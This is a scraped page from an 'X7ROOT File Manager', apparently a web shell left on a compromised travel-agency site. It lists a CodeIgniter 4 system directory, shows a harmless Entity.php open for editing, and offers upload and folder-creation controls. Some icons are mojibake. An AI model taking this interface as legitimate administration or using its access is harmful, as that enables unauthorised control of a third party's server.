X7ROOT File Manager
Current Path:
/home/hamdjcne/app.hamdalillahitravel.com/system
home
/
hamdjcne
/
app.hamdalillahitravel.com
/
system
/
ðŸ“
..
📄
.DS_Store
(14 KB)
📄
.htaccess
(118 B)
ðŸ“
API
ðŸ“
Autoloader
📄
BaseModel.php
(47.57 KB)
ðŸ“
CLI
ðŸ“
Cache
📄
CodeIgniter.php
(29.48 KB)
ðŸ“
Commands
📄
Common.php
(33.77 KB)
📄
ComposerScripts.php
(4.99 KB)
ðŸ“
Config
📄
Controller.php
(4.26 KB)
ðŸ“
Cookie
ðŸ“
Database
ðŸ“
Debug
ðŸ“
Email
ðŸ“
Encryption
ðŸ“
Entity
📄
Entity.php
(484 B)
ðŸ“
Events
ðŸ“
Exceptions
ðŸ“
Files
ðŸ“
Filters
ðŸ“
Format
ðŸ“
HTTP
ðŸ“
Helpers
ðŸ“
Honeypot
ðŸ“
I18n
ðŸ“
Images
ðŸ“
Language
ðŸ“
Log
📄
Model.php
(23.69 KB)
ðŸ“
Modules
ðŸ“
Pager
ðŸ“
Publisher
ðŸ“
RESTful
ðŸ“
Router
ðŸ“
Security
ðŸ“
Session
ðŸ“
Test
ðŸ“
ThirdParty
ðŸ“
Throttle
ðŸ“
Typography
ðŸ“
Validation
ðŸ“
View
📄
bootstrap.php
(4.21 KB)
📄
index.html
(131 B)
Editing: Entity.php
<?php /** * This file is part of CodeIgniter 4 framework. * * (c) CodeIgniter Foundation <admin@codeigniter.com> * * For the full copyright and license information, please view * the LICENSE file that was distributed with this source code. */ namespace CodeIgniter; use CodeIgniter\Entity\Entity as CoreEntity; /** * Entity encapsulation, for use with CodeIgniter\Model * * @deprecated use CodeIgniter\Entity\Entity class instead */ class Entity extends CoreEntity { }
Upload File
Create Folder